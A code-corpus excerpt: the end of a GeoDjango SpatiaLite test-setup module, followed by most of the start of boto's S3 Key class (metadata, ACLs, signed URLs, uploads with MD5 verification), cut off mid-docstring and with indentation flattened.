if not os.path.isfile(spatialite_sql):
raise ImproperlyConfigured('Could not find the required SpatiaLite initialization '
'SQL file (necessary for testing): %s' % spatialite_sql)
# Opening up the SpatiaLite SQL initialization file and executing
# as a script.
with open(spatialite_sql, 'r') as sql_fh:
cur = self.connection._cursor()
cur.executescript(sql_fh.read())
def spatialite_init_file(self):
# SPATIALITE_SQL may be placed in settings to tell GeoDjango
# to use a specific path to the SpatiaLite initialization SQL.
return getattr(settings, 'SPATIALITE_SQL',
'init_spatialite-%s.%s.sql' %
self.connection.ops.spatial_version[:2])
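# For example, with SpatiaLite 2.3 and no override this resolves to
# 'init_spatialite-2.3.sql'; a project can instead pin an explicit
# (illustrative) path in settings:
# SPATIALITE_SQL = '/path/to/init_spatialite-2.3.sql'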
| agpl-3.0 |
bleib1dj/boto | boto/s3/key.py | 22 | 82475 | # Copyright (c) 2006-2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2011, Nexenta Systems Inc.
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import email.utils
import errno
import hashlib
import mimetypes
import os
import re
import base64
import binascii
import math
from hashlib import md5
import boto.utils
from boto.compat import BytesIO, six, urllib, encodebytes
from boto.exception import BotoClientError
from boto.exception import StorageDataError
from boto.exception import PleaseRetryException
from boto.provider import Provider
from boto.s3.keyfile import KeyFile
from boto.s3.user import User
from boto import UserAgent
from boto.utils import compute_md5, compute_hash
from boto.utils import find_matching_headers
from boto.utils import merge_headers_by_name
class Key(object):
"""
Represents a key (object) in an S3 bucket.
:ivar bucket: The parent :class:`boto.s3.bucket.Bucket`.
:ivar name: The name of this Key object.
:ivar metadata: A dictionary containing user metadata that you
wish to store with the object or that has been retrieved from
an existing object.
:ivar cache_control: The value of the `Cache-Control` HTTP header.
:ivar content_type: The value of the `Content-Type` HTTP header.
:ivar content_encoding: The value of the `Content-Encoding` HTTP header.
:ivar content_disposition: The value of the `Content-Disposition` HTTP
header.
:ivar content_language: The value of the `Content-Language` HTTP header.
:ivar etag: The `etag` associated with this object.
:ivar last_modified: The string timestamp representing the last
time this object was modified in S3.
:ivar owner: The ID of the owner of this object.
:ivar storage_class: The storage class of the object. Currently, one of:
STANDARD | REDUCED_REDUNDANCY | GLACIER
:ivar md5: The MD5 hash of the contents of the object.
:ivar size: The size, in bytes, of the object.
:ivar version_id: The version ID of this object, if it is a versioned
object.
:ivar encrypted: Whether the object is encrypted while at rest on
the server.
"""
DefaultContentType = 'application/octet-stream'
RestoreBody = """<?xml version="1.0" encoding="UTF-8"?>
<RestoreRequest xmlns="http://s3.amazonaws.com/doc/2006-03-01">
<Days>%s</Days>
</RestoreRequest>"""
BufferSize = boto.config.getint('Boto', 'key_buffer_size', 8192)
# The object metadata fields a user can set, other than custom metadata
# fields (i.e., those beginning with a provider-specific prefix like
# x-amz-meta).
base_user_settable_fields = set(["cache-control", "content-disposition",
"content-encoding", "content-language",
"content-md5", "content-type",
"x-robots-tag", "expires"])
_underscore_base_user_settable_fields = set()
for f in base_user_settable_fields:
_underscore_base_user_settable_fields.add(f.replace('-', '_'))
# Metadata fields, whether user-settable or not, other than custom
# metadata fields (i.e., those beginning with a provider specific prefix
# like x-amz-meta).
base_fields = (base_user_settable_fields |
set(["last-modified", "content-length", "date", "etag"]))
def __init__(self, bucket=None, name=None):
self.bucket = bucket
self.name = name
self.metadata = {}
self.cache_control = None
self.content_type = self.DefaultContentType
self.content_encoding = None
self.content_disposition = None
self.content_language = None
self.filename = None
self.etag = None
self.is_latest = False
self.last_modified = None
self.owner = None
self._storage_class = None
self.path = None
self.resp = None
self.mode = None
self.size = None
self.version_id = None
self.source_version_id = None
self.delete_marker = False
self.encrypted = None
# If the object is being restored, this attribute will be set to True.
# If the object is restored, it will be set to False. Otherwise this
# value will be None. If the restore is completed (ongoing_restore =
# False), the expiry_date will be populated with the expiry date of the
# restored object.
self.ongoing_restore = None
self.expiry_date = None
self.local_hashes = {}
def __repr__(self):
if self.bucket:
name = u'<Key: %s,%s>' % (self.bucket.name, self.name)
else:
name = u'<Key: None,%s>' % self.name
# Encode to bytes for Python 2 to prevent display decoding issues
if not isinstance(name, str):
name = name.encode('utf-8')
return name
def __iter__(self):
return self
@property
def provider(self):
provider = None
if self.bucket and self.bucket.connection:
provider = self.bucket.connection.provider
return provider
def _get_key(self):
return self.name
def _set_key(self, value):
self.name = value
key = property(_get_key, _set_key)
def _get_md5(self):
if 'md5' in self.local_hashes and self.local_hashes['md5']:
return binascii.b2a_hex(self.local_hashes['md5'])
def _set_md5(self, value):
if value:
self.local_hashes['md5'] = binascii.a2b_hex(value)
elif 'md5' in self.local_hashes:
self.local_hashes.pop('md5', None)
md5 = property(_get_md5, _set_md5)
def _get_base64md5(self):
if 'md5' in self.local_hashes and self.local_hashes['md5']:
md5 = self.local_hashes['md5']
if not isinstance(md5, bytes):
md5 = md5.encode('utf-8')
return binascii.b2a_base64(md5).decode('utf-8').rstrip('\n')
def _set_base64md5(self, value):
if value:
if not isinstance(value, six.string_types):
value = value.decode('utf-8')
self.local_hashes['md5'] = binascii.a2b_base64(value)
elif 'md5' in self.local_hashes:
del self.local_hashes['md5']
base64md5 = property(_get_base64md5, _set_base64md5)
def _get_storage_class(self):
if self._storage_class is None and self.bucket:
# Attempt to fetch storage class
list_items = list(self.bucket.list(self.name.encode('utf-8')))
if len(list_items) and getattr(list_items[0], '_storage_class',
None):
self._storage_class = list_items[0]._storage_class
else:
# Key is not yet saved? Just use default...
self._storage_class = 'STANDARD'
return self._storage_class
def _set_storage_class(self, value):
self._storage_class = value
storage_class = property(_get_storage_class, _set_storage_class)
def get_md5_from_hexdigest(self, md5_hexdigest):
"""
A utility function to create the 2-tuple (md5hexdigest, base64md5)
from just having a precalculated md5_hexdigest.
"""
digest = binascii.unhexlify(md5_hexdigest)
# encodebytes() appends a trailing newline; decode and strip it so the
# base64 digest is a plain string on both Python 2 and Python 3 (the
# old bytes-vs-str comparison never matched under Python 3).
base64md5 = encodebytes(digest).decode('utf-8').rstrip('\n')
return (md5_hexdigest, base64md5)
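# Worked example: for the MD5 of an empty payload,
# get_md5_from_hexdigest('d41d8cd98f00b204e9800998ecf8427e') returns
# ('d41d8cd98f00b204e9800998ecf8427e', '1B2M2Y8AsgTpgAmY7PhCfg==').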
def handle_encryption_headers(self, resp):
provider = self.bucket.connection.provider
if provider.server_side_encryption_header:
self.encrypted = resp.getheader(
provider.server_side_encryption_header, None)
else:
self.encrypted = None
def handle_version_headers(self, resp, force=False):
provider = self.bucket.connection.provider
# If the Key object already has a version_id attribute value, it
# means that it represents an explicit version and the user is
# doing a get_contents_*(version_id=<foo>) to retrieve another
# version of the Key. In that case, we don't really want to
# overwrite the version_id in this Key object. Comprende?
if self.version_id is None or force:
self.version_id = resp.getheader(provider.version_id, None)
self.source_version_id = resp.getheader(provider.copy_source_version_id,
None)
if resp.getheader(provider.delete_marker, 'false') == 'true':
self.delete_marker = True
else:
self.delete_marker = False
def handle_restore_headers(self, response):
provider = self.bucket.connection.provider
header = response.getheader(provider.restore_header)
if header is None:
return
parts = header.split(',', 1)
for part in parts:
key, val = [i.strip() for i in part.split('=')]
val = val.replace('"', '')
if key == 'ongoing-request':
self.ongoing_restore = True if val.lower() == 'true' else False
elif key == 'expiry-date':
self.expiry_date = val
def handle_addl_headers(self, headers):
"""
Used by Key subclasses to do additional, provider-specific
processing of response headers. No-op for this base class.
"""
pass
def open_read(self, headers=None, query_args='',
override_num_retries=None, response_headers=None):
"""
Open this key for reading
:type headers: dict
:param headers: Headers to pass in the web request
:type query_args: string
:param query_args: Arguments to pass in the query string
(ie, 'torrent')
:type override_num_retries: int
:param override_num_retries: If not None will override configured
num_retries parameter for underlying GET.
:type response_headers: dict
:param response_headers: A dictionary containing HTTP
headers/values that will override any headers associated
with the stored object in the response. See
http://goo.gl/EWOPb for details.
"""
if self.resp is None:
self.mode = 'r'
provider = self.bucket.connection.provider
self.resp = self.bucket.connection.make_request(
'GET', self.bucket.name, self.name, headers,
query_args=query_args,
override_num_retries=override_num_retries)
if self.resp.status < 200 or self.resp.status > 299:
body = self.resp.read()
raise provider.storage_response_error(self.resp.status,
self.resp.reason, body)
response_headers = self.resp.msg
self.metadata = boto.utils.get_aws_metadata(response_headers,
provider)
for name, value in response_headers.items():
# To get correct size for Range GETs, use Content-Range
# header if one was returned. If not, use Content-Length
# header.
if (name.lower() == 'content-length' and
'Content-Range' not in response_headers):
self.size = int(value)
elif name.lower() == 'content-range':
end_range = re.sub('.*/(.*)', '\\1', value)
self.size = int(end_range)
elif name.lower() in Key.base_fields:
self.__dict__[name.lower().replace('-', '_')] = value
self.handle_version_headers(self.resp)
self.handle_encryption_headers(self.resp)
self.handle_restore_headers(self.resp)
self.handle_addl_headers(self.resp.getheaders())
def open_write(self, headers=None, override_num_retries=None):
"""
Open this key for writing.
Not yet implemented
:type headers: dict
:param headers: Headers to pass in the write request
:type override_num_retries: int
:param override_num_retries: If not None will override configured
num_retries parameter for underlying PUT.
"""
raise BotoClientError('Not Implemented')
def open(self, mode='r', headers=None, query_args=None,
override_num_retries=None):
if mode == 'r':
self.mode = 'r'
self.open_read(headers=headers, query_args=query_args,
override_num_retries=override_num_retries)
elif mode == 'w':
self.mode = 'w'
self.open_write(headers=headers,
override_num_retries=override_num_retries)
else:
raise BotoClientError('Invalid mode: %s' % mode)
closed = False
def close(self, fast=False):
"""
Close this key.
:type fast: bool
:param fast: True if you want the connection to be closed without first
reading the content. This should only be used in cases where subsequent
calls don't need to return the content from the open HTTP connection.
Note: As explained at
http://docs.python.org/2/library/httplib.html#httplib.HTTPConnection.getresponse,
callers must read the whole response before sending a new request to the
server. Calling Key.close(fast=True) and making a subsequent request to
the server will work because boto will get an httplib exception and
close/reopen the connection.
"""
if self.resp and not fast:
self.resp.read()
self.resp = None
self.mode = None
self.closed = True
def next(self):
"""
By providing a next method, the key object supports use as an iterator.
For example, you can now say:
for bytes in key:
write bytes to a file or whatever
All of the HTTP connection stuff is handled for you.
"""
self.open_read()
data = self.resp.read(self.BufferSize)
if not data:
self.close()
raise StopIteration
return data
# Python 3 iterator support
__next__ = next
def read(self, size=0):
self.open_read()
if size == 0:
data = self.resp.read()
else:
data = self.resp.read(size)
if not data:
self.close()
return data
def change_storage_class(self, new_storage_class, dst_bucket=None,
validate_dst_bucket=True):
"""
Change the storage class of an existing key.
Depending on whether a different destination bucket is supplied
or not, this will either move the item within the bucket, preserving
all metadata and ACL info while changing the storage class, or it
will copy the item to the provided destination bucket, also
preserving metadata and ACL info.
:type new_storage_class: string
:param new_storage_class: The new storage class for the Key.
Possible values are:
* STANDARD
* REDUCED_REDUNDANCY
:type dst_bucket: string
:param dst_bucket: The name of a destination bucket. If not
provided the current bucket of the key will be used.
:type validate_dst_bucket: bool
:param validate_dst_bucket: If True, will validate the dst_bucket
by using an extra list request.
"""
bucket_name = dst_bucket or self.bucket.name
if new_storage_class == 'STANDARD':
return self.copy(bucket_name, self.name,
reduced_redundancy=False, preserve_acl=True,
validate_dst_bucket=validate_dst_bucket)
elif new_storage_class == 'REDUCED_REDUNDANCY':
return self.copy(bucket_name, self.name,
reduced_redundancy=True, preserve_acl=True,
validate_dst_bucket=validate_dst_bucket)
else:
raise BotoClientError('Invalid storage class: %s' %
new_storage_class)
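# Hedged usage sketch (bucket and key names are illustrative):
# key = bucket.get_key('logs/2014-01-01.gz')
# key.change_storage_class('REDUCED_REDUNDANCY')
# copies the object onto RRS storage in place, preserving metadata/ACLs.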
def copy(self, dst_bucket, dst_key, metadata=None,
reduced_redundancy=False, preserve_acl=False,
encrypt_key=False, validate_dst_bucket=True):
"""
Copy this Key to another bucket.
:type dst_bucket: string
:param dst_bucket: The name of the destination bucket
:type dst_key: string
:param dst_key: The name of the destination key
:type metadata: dict
:param metadata: Metadata to be associated with new key. If
metadata is supplied, it will replace the metadata of the
source key being copied. If no metadata is supplied, the
source key's metadata will be copied to the new key.
:type reduced_redundancy: bool
:param reduced_redundancy: If True, this will force the
storage class of the new Key to be REDUCED_REDUNDANCY
regardless of the storage class of the key being copied.
The Reduced Redundancy Storage (RRS) feature of S3,
provides lower redundancy at lower storage cost.
:type preserve_acl: bool
:param preserve_acl: If True, the ACL from the source key will
be copied to the destination key. If False, the
destination key will have the default ACL. Note that
preserving the ACL in the new key object will require two
additional API calls to S3, one to retrieve the current
ACL and one to set that ACL on the new object. If you
don't care about the ACL, a value of False will be
significantly more efficient.
:type encrypt_key: bool
:param encrypt_key: If True, the new copy of the object will
be encrypted on the server-side by S3 and will be stored
in an encrypted form while at rest in S3.
:type validate_dst_bucket: bool
:param validate_dst_bucket: If True, will validate the dst_bucket
by using an extra list request.
:rtype: :class:`boto.s3.key.Key` or subclass
:returns: An instance of the newly created key object
"""
dst_bucket = self.bucket.connection.lookup(dst_bucket,
validate_dst_bucket)
if reduced_redundancy:
storage_class = 'REDUCED_REDUNDANCY'
else:
storage_class = self.storage_class
return dst_bucket.copy_key(dst_key, self.bucket.name,
self.name, metadata,
storage_class=storage_class,
preserve_acl=preserve_acl,
encrypt_key=encrypt_key,
src_version_id=self.version_id)
def startElement(self, name, attrs, connection):
if name == 'Owner':
self.owner = User(self)
return self.owner
else:
return None
def endElement(self, name, value, connection):
if name == 'Key':
self.name = value
elif name == 'ETag':
self.etag = value
elif name == 'IsLatest':
if value == 'true':
self.is_latest = True
else:
self.is_latest = False
elif name == 'LastModified':
self.last_modified = value
elif name == 'Size':
self.size = int(value)
elif name == 'StorageClass':
self.storage_class = value
elif name == 'Owner':
pass
elif name == 'VersionId':
self.version_id = value
else:
setattr(self, name, value)
def exists(self, headers=None):
"""
Returns True if the key exists
:rtype: bool
:return: Whether the key exists on S3
"""
return bool(self.bucket.lookup(self.name, headers=headers))
def delete(self, headers=None):
"""
Delete this key from S3
"""
return self.bucket.delete_key(self.name, version_id=self.version_id,
headers=headers)
def get_metadata(self, name):
return self.metadata.get(name)
def set_metadata(self, name, value):
# Ensure that metadata that is vital to signing is in the correct
# case. Applies to ``Content-Type`` & ``Content-MD5``.
if name.lower() == 'content-type':
self.metadata['Content-Type'] = value
elif name.lower() == 'content-md5':
self.metadata['Content-MD5'] = value
else:
self.metadata[name] = value
if name.lower() in Key.base_user_settable_fields:
self.__dict__[name.lower().replace('-', '_')] = value
def update_metadata(self, d):
self.metadata.update(d)
# convenience methods for setting/getting ACL
def set_acl(self, acl_str, headers=None):
if self.bucket is not None:
self.bucket.set_acl(acl_str, self.name, headers=headers)
def get_acl(self, headers=None):
if self.bucket is not None:
return self.bucket.get_acl(self.name, headers=headers)
def get_xml_acl(self, headers=None):
if self.bucket is not None:
return self.bucket.get_xml_acl(self.name, headers=headers)
def set_xml_acl(self, acl_str, headers=None):
if self.bucket is not None:
return self.bucket.set_xml_acl(acl_str, self.name, headers=headers)
def set_canned_acl(self, acl_str, headers=None):
return self.bucket.set_canned_acl(acl_str, self.name, headers)
def get_redirect(self):
"""Return the redirect location configured for this key.
If no redirect is configured (via set_redirect), then None
will be returned.
"""
response = self.bucket.connection.make_request(
'HEAD', self.bucket.name, self.name)
if response.status == 200:
return response.getheader('x-amz-website-redirect-location')
else:
raise self.provider.storage_response_error(
response.status, response.reason, response.read())
def set_redirect(self, redirect_location, headers=None):
"""Configure this key to redirect to another location.
When the bucket associated with this key is accessed from the website
endpoint, a 301 redirect will be issued to the specified
`redirect_location`.
:type redirect_location: string
:param redirect_location: The location to redirect.
"""
if headers is None:
headers = {}
else:
headers = headers.copy()
headers['x-amz-website-redirect-location'] = redirect_location
response = self.bucket.connection.make_request('PUT', self.bucket.name,
self.name, headers)
if response.status == 200:
return True
else:
raise self.provider.storage_response_error(
response.status, response.reason, response.read())
def make_public(self, headers=None):
return self.bucket.set_canned_acl('public-read', self.name, headers)
def generate_url(self, expires_in, method='GET', headers=None,
query_auth=True, force_http=False, response_headers=None,
expires_in_absolute=False, version_id=None,
policy=None, reduced_redundancy=False, encrypt_key=False):
"""
Generate a URL to access this key.
:type expires_in: int
:param expires_in: How long the url is valid for, in seconds.
:type method: string
:param method: The method to use for retrieving the file
(default is GET).
:type headers: dict
:param headers: Any headers to pass along in the request.
:type query_auth: bool
:param query_auth: If True, signs the request in the URL.
:type force_http: bool
:param force_http: If True, http will be used instead of https.
:type response_headers: dict
:param response_headers: A dictionary containing HTTP
headers/values that will override any headers associated
with the stored object in the response. See
http://goo.gl/EWOPb for details.
:type expires_in_absolute: bool
:param expires_in_absolute:
:type version_id: string
:param version_id: The version_id of the object to GET. If specified
this overrides any value in the key.
:type policy: :class:`boto.s3.acl.CannedACLStrings`
:param policy: A canned ACL policy that will be applied to the
new key in S3.
:type reduced_redundancy: bool
:param reduced_redundancy: If True, this will set the storage
class of the new Key to be REDUCED_REDUNDANCY. The Reduced
Redundancy Storage (RRS) feature of S3, provides lower
redundancy at lower storage cost.
:type encrypt_key: bool
:param encrypt_key: If True, the new copy of the object will
be encrypted on the server-side by S3 and will be stored
in an encrypted form while at rest in S3.
:rtype: string
:return: The URL to access the key
"""
provider = self.bucket.connection.provider
version_id = version_id or self.version_id
if headers is None:
headers = {}
else:
headers = headers.copy()
# add headers accordingly (usually PUT case)
if policy:
headers[provider.acl_header] = policy
if reduced_redundancy:
self.storage_class = 'REDUCED_REDUNDANCY'
if provider.storage_class_header:
headers[provider.storage_class_header] = self.storage_class
if encrypt_key:
headers[provider.server_side_encryption_header] = 'AES256'
headers = boto.utils.merge_meta(headers, self.metadata, provider)
return self.bucket.connection.generate_url(expires_in, method,
self.bucket.name, self.name,
headers, query_auth,
force_http,
response_headers,
expires_in_absolute,
version_id)
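# Hedged usage sketch (expiry and header values are illustrative):
# url = key.generate_url(3600) # signed GET URL, valid 1 hour
# upload_url = key.generate_url(3600, method='PUT',
# headers={'Content-Type': 'text/plain'})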
def send_file(self, fp, headers=None, cb=None, num_cb=10,
query_args=None, chunked_transfer=False, size=None):
"""
Upload a file to a key into a bucket on S3.
:type fp: file
:param fp: The file pointer to upload. The file pointer must
point at the offset from which you wish to upload.
ie. if uploading the full file, it should point at the
start of the file. Normally when a file is opened for
reading, the fp will point at the first byte. See the
bytes parameter below for more info.
:type headers: dict
:param headers: The headers to pass along with the PUT request
:type num_cb: int
:param num_cb: (optional) If a callback is specified with the
cb parameter this parameter determines the granularity of
the callback by defining the maximum number of times the
callback will be called during the file
transfer. Providing a negative integer will cause your
callback to be called with each buffer read.
:type query_args: string
:param query_args: (optional) Arguments to pass in the query string.
:type chunked_transfer: boolean
:param chunked_transfer: (optional) If true, we use chunked
Transfer-Encoding.
:type size: int
:param size: (optional) The Maximum number of bytes to read
from the file pointer (fp). This is useful when uploading
a file in multiple parts where you are splitting the file
up into different ranges to be uploaded. If not specified,
the default behaviour is to read all bytes from the file
pointer. Fewer bytes may be available.
"""
self._send_file_internal(fp, headers=headers, cb=cb, num_cb=num_cb,
query_args=query_args,
chunked_transfer=chunked_transfer, size=size)
def _send_file_internal(self, fp, headers=None, cb=None, num_cb=10,
query_args=None, chunked_transfer=False, size=None,
hash_algs=None):
provider = self.bucket.connection.provider
try:
spos = fp.tell()
except IOError:
spos = None
self.read_from_stream = False
# If hash_algs is unset and the MD5 hasn't already been computed,
# default to an MD5 hash_alg to hash the data on-the-fly.
if hash_algs is None and not self.md5:
hash_algs = {'md5': md5}
digesters = dict((alg, hash_algs[alg]()) for alg in hash_algs or {})
def sender(http_conn, method, path, data, headers):
# This function is called repeatedly for temporary retries
# so we must be sure the file pointer is pointing at the
# start of the data.
if spos is not None and spos != fp.tell():
fp.seek(spos)
elif spos is None and self.read_from_stream:
# if seek is not supported, and we've read from this
# stream already, then we need to abort retries to
# avoid setting bad data.
raise provider.storage_data_error(
'Cannot retry failed request. fp does not support seeking.')
# If the caller explicitly specified host header, tell putrequest
# not to add a second host header. Similarly for accept-encoding.
skips = {}
if boto.utils.find_matching_headers('host', headers):
skips['skip_host'] = 1
if boto.utils.find_matching_headers('accept-encoding', headers):
skips['skip_accept_encoding'] = 1
http_conn.putrequest(method, path, **skips)
for key in headers:
http_conn.putheader(key, headers[key])
http_conn.endheaders()
save_debug = self.bucket.connection.debug
self.bucket.connection.debug = 0
# If the debuglevel < 4 we don't want to show connection
# payload, so turn off HTTP connection-level debug output (to
# be restored below).
# Use the getattr approach to allow this to work in AppEngine.
if getattr(http_conn, 'debuglevel', 0) < 4:
http_conn.set_debuglevel(0)
data_len = 0
if cb:
if size:
cb_size = size
elif self.size:
cb_size = self.size
else:
cb_size = 0
if chunked_transfer and cb_size == 0:
# For chunked Transfer, we call the cb for every 1MB
# of data transferred, except when we know size.
cb_count = (1024 * 1024) / self.BufferSize
elif num_cb > 1:
cb_count = int(
math.ceil(cb_size / self.BufferSize / (num_cb - 1.0)))
elif num_cb < 0:
cb_count = -1
else:
cb_count = 0
i = 0
cb(data_len, cb_size)
bytes_togo = size
if bytes_togo and bytes_togo < self.BufferSize:
chunk = fp.read(bytes_togo)
else:
chunk = fp.read(self.BufferSize)
if not isinstance(chunk, bytes):
chunk = chunk.encode('utf-8')
if spos is None:
# read at least something from a non-seekable fp.
self.read_from_stream = True
while chunk:
chunk_len = len(chunk)
data_len += chunk_len
if chunked_transfer:
http_conn.send('%x;\r\n' % chunk_len)
http_conn.send(chunk)
http_conn.send('\r\n')
else:
http_conn.send(chunk)
for alg in digesters:
digesters[alg].update(chunk)
if bytes_togo:
bytes_togo -= chunk_len
if bytes_togo <= 0:
break
if cb:
i += 1
if i == cb_count or cb_count == -1:
cb(data_len, cb_size)
i = 0
if bytes_togo and bytes_togo < self.BufferSize:
chunk = fp.read(bytes_togo)
else:
chunk = fp.read(self.BufferSize)
if not isinstance(chunk, bytes):
chunk = chunk.encode('utf-8')
self.size = data_len
for alg in digesters:
self.local_hashes[alg] = digesters[alg].digest()
if chunked_transfer:
http_conn.send('0\r\n')
# http_conn.send("Content-MD5: %s\r\n" % self.base64md5)
http_conn.send('\r\n')
if cb and (cb_count <= 1 or i > 0) and data_len > 0:
cb(data_len, cb_size)
http_conn.set_debuglevel(save_debug)
self.bucket.connection.debug = save_debug
response = http_conn.getresponse()
body = response.read()
if not self.should_retry(response, chunked_transfer):
raise provider.storage_response_error(
response.status, response.reason, body)
return response
if not headers:
headers = {}
else:
headers = headers.copy()
# Overwrite user-supplied user-agent.
for header in find_matching_headers('User-Agent', headers):
del headers[header]
headers['User-Agent'] = UserAgent
# If storage_class is None, then a user has not explicitly requested
# a storage class, so we can assume STANDARD here
if self._storage_class not in [None, 'STANDARD']:
headers[provider.storage_class_header] = self.storage_class
if find_matching_headers('Content-Encoding', headers):
self.content_encoding = merge_headers_by_name(
'Content-Encoding', headers)
if find_matching_headers('Content-Language', headers):
self.content_language = merge_headers_by_name(
'Content-Language', headers)
content_type_headers = find_matching_headers('Content-Type', headers)
if content_type_headers:
# Some use cases need to suppress sending of the Content-Type
# header and depend on the receiving server to set the content
# type. This can be achieved by setting headers['Content-Type']
# to None when calling this method.
if (len(content_type_headers) == 1 and
headers[content_type_headers[0]] is None):
# Delete null Content-Type value to skip sending that header.
del headers[content_type_headers[0]]
else:
self.content_type = merge_headers_by_name(
'Content-Type', headers)
elif self.path:
self.content_type = mimetypes.guess_type(self.path)[0]
if self.content_type is None:
self.content_type = self.DefaultContentType
headers['Content-Type'] = self.content_type
else:
headers['Content-Type'] = self.content_type
if self.base64md5:
headers['Content-MD5'] = self.base64md5
if chunked_transfer:
headers['Transfer-Encoding'] = 'chunked'
#if not self.base64md5:
# headers['Trailer'] = "Content-MD5"
else:
headers['Content-Length'] = str(self.size)
# This is terrible. We need a SHA256 of the body for SigV4, but to do
# the chunked ``sender`` behavior above, the ``fp`` isn't available to
# the auth mechanism (because closures). Detect if it's SigV4 & embelish
# while we can before the auth calculations occur.
if 'hmac-v4-s3' in self.bucket.connection._required_auth_capability():
kwargs = {'fp': fp, 'hash_algorithm': hashlib.sha256}
if size is not None:
kwargs['size'] = size
headers['_sha256'] = compute_hash(**kwargs)[0]
headers['Expect'] = '100-Continue'
headers = boto.utils.merge_meta(headers, self.metadata, provider)
resp = self.bucket.connection.make_request(
'PUT',
self.bucket.name,
self.name,
headers,
sender=sender,
query_args=query_args
)
self.handle_version_headers(resp, force=True)
self.handle_addl_headers(resp.getheaders())
def should_retry(self, response, chunked_transfer=False):
provider = self.bucket.connection.provider
if not chunked_transfer:
if response.status in [500, 503]:
# 500 & 503 can be plain retries.
return True
if response.getheader('location'):
# If there's a redirect, plain retry.
return True
if 200 <= response.status <= 299:
self.etag = response.getheader('etag')
md5 = self.md5
if isinstance(md5, bytes):
md5 = md5.decode('utf-8')
# If you use customer-provided encryption keys, the ETag value that
# Amazon S3 returns in the response will not be the MD5 of the
# object.
server_side_encryption_customer_algorithm = response.getheader(
'x-amz-server-side-encryption-customer-algorithm', None)
if server_side_encryption_customer_algorithm is None:
if self.etag != '"%s"' % md5:
raise provider.storage_data_error(
'ETag from S3 did not match computed MD5. '
'%s vs. %s' % (self.etag, self.md5))
return True
if response.status == 400:
# The 400 must be trapped so the retry handler can check to
# see if it was a timeout.
# If ``RequestTimeout`` is present, we'll retry. Otherwise, bomb
# out.
body = response.read()
err = provider.storage_response_error(
response.status,
response.reason,
body
)
if err.error_code in ['RequestTimeout']:
raise PleaseRetryException(
"Saw %s, retrying" % err.error_code,
response=response
)
return False
def compute_md5(self, fp, size=None):
"""
:type fp: file
:param fp: File pointer to the file to MD5 hash. The file
pointer will be reset to the same position before the
method returns.
:type size: int
:param size: (optional) The Maximum number of bytes to read
from the file pointer (fp). This is useful when uploading
a file in multiple parts where the file is being split
in place into different parts. Fewer bytes may be available.
"""
hex_digest, b64_digest, data_size = compute_md5(fp, size=size)
# Returned values are MD5 hash, base64 encoded MD5 hash, and data size.
# The internal implementation of compute_md5() needs to return the
# data size but we don't want to return that value to the external
# caller because it changes the class interface (i.e. it might
# break some code) so we consume the third tuple value here and
# return the remainder of the tuple to the caller, thereby preserving
# the existing interface.
self.size = data_size
return (hex_digest, b64_digest)
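# Hedged usage sketch (path is illustrative): a precomputed digest pair
# can be reused to avoid hashing the file twice:
# fp = open('/tmp/data.bin', 'rb')
# md5_tuple = key.compute_md5(fp)
# key.set_contents_from_file(fp, md5=md5_tuple)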
def set_contents_from_stream(self, fp, headers=None, replace=True,
cb=None, num_cb=10, policy=None,
reduced_redundancy=False, query_args=None,
size=None):
"""
Store an object using the name of the Key object as the key in
cloud and the contents of the data stream pointed to by 'fp' as
the contents.
The stream object is not seekable and total size is not known.
This has the implication that we can't specify the
Content-Length and Content-MD5 headers. So for huge
uploads, the delay in calculating MD5 is avoided but with a
penalty of inability to verify the integrity of the uploaded
data.
:type fp: file
:param fp: the file whose contents are to be uploaded
:type headers: dict
:param headers: additional HTTP headers to be sent with the
PUT request.
:type replace: bool
:param replace: If this parameter is False, the method will first check
to see if an object exists in the bucket with the same key. If it
does, it won't overwrite it. The default value is True which will
overwrite the object.
:type cb: function
:param cb: a callback function that will be called to report
progress on the upload. The callback should accept two integer
parameters, the first representing the number of bytes that have
been successfully transmitted to GS and the second representing the
total number of bytes that need to be transmitted.
:type num_cb: int
:param num_cb: (optional) If a callback is specified with the
cb parameter, this parameter determines the granularity of
the callback by defining the maximum number of times the
callback will be called during the file transfer.
:type policy: :class:`boto.gs.acl.CannedACLStrings`
:param policy: A canned ACL policy that will be applied to the new key
in GS.
:type reduced_redundancy: bool
:param reduced_redundancy: If True, this will set the storage
class of the new Key to be REDUCED_REDUNDANCY. The Reduced
Redundancy Storage (RRS) feature of S3, provides lower
redundancy at lower storage cost.
:type size: int
:param size: (optional) The Maximum number of bytes to read from
the file pointer (fp). This is useful when uploading a
file in multiple parts where you are splitting the file up
into different ranges to be uploaded. If not specified,
the default behaviour is to read all bytes from the file
pointer. Fewer bytes may be available.
"""
provider = self.bucket.connection.provider
if not provider.supports_chunked_transfer():
raise BotoClientError('%s does not support chunked transfer'
% provider.get_provider_name())
# Name of the Object should be specified explicitly for Streams.
if not self.name or self.name == '':
raise BotoClientError('Cannot determine the destination '
'object name for the given stream')
if headers is None:
headers = {}
if policy:
headers[provider.acl_header] = policy
if reduced_redundancy:
self.storage_class = 'REDUCED_REDUNDANCY'
if provider.storage_class_header:
headers[provider.storage_class_header] = self.storage_class
if self.bucket is not None:
if not replace:
if self.bucket.lookup(self.name):
return
self.send_file(fp, headers, cb, num_cb, query_args,
chunked_transfer=True, size=size)
def set_contents_from_file(self, fp, headers=None, replace=True,
cb=None, num_cb=10, policy=None, md5=None,
reduced_redundancy=False, query_args=None,
encrypt_key=False, size=None, rewind=False):
"""
Store an object in S3 using the name of the Key object as the
key in S3 and the contents of the file pointed to by 'fp' as the
contents. The data is read from 'fp' from its current position until
'size' bytes have been read or EOF.
